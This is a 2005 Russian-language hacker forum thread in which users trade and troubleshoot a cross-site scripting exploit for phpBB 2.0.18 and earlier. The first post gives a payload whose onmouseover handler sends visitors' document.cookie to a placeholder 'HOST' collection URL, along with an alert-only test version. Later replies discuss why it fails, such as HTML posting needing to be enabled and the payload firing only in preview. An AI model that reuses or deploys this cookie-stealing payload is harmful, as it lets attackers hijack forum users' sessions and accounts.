Форумы phpBB <= 2.0.18 exploit

Discussion in 'Уязвимости CMS/форумов' started by froZen*, 22 Dec 2005.

  1. froZen*

    froZen* New Member

    Joined:
    21 Nov 2005
    Messages:
    6
    Likes Received:
    2
    Reputations:
    -1
    Вот собсно нашел эксплоит для пхпББ
    Code:
    <*B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)
" X="<B "> H A L O </B*>
    Но он что-то не пашет в чем проблема объясните

    Зато пашет вот этот
    Code:
    <*B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B*>
     
    #1 froZen*, 22 Dec 2005
  2. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Ты уверен что н должен работать на 2.0.18?По моему это ранние версии может ты перепутал с 2.0.8
     
    #2 cardons, 22 Dec 2005
  3. Enter.beta

    Enter.beta New Member

    Joined:
    4 Nov 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    dlia etogo nuzno ctob bilo vkliucino allow HTML, inace nikak kazetsia
     
    #3 Enter.beta, 22 Dec 2005
  4. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    да, это пошет при "Предпросмотре", но когда постишь - нет
     
    #4 max_pain89, 22 Dec 2005
  5. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    cardons кто тебе сказал? это новая хсс...
     
    #5 m0nzt3r, 22 Dec 2005
  6. froZen*

    froZen* New Member

    Joined:
    21 Nov 2005
    Messages:
    6
    Likes Received:
    2
    Reputations:
    -1
    Слушай m0nzt3r если не сложно давай в icq поговорим плз моя ася 239-635-100
     
    #6 froZen*, 22 Dec 2005
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.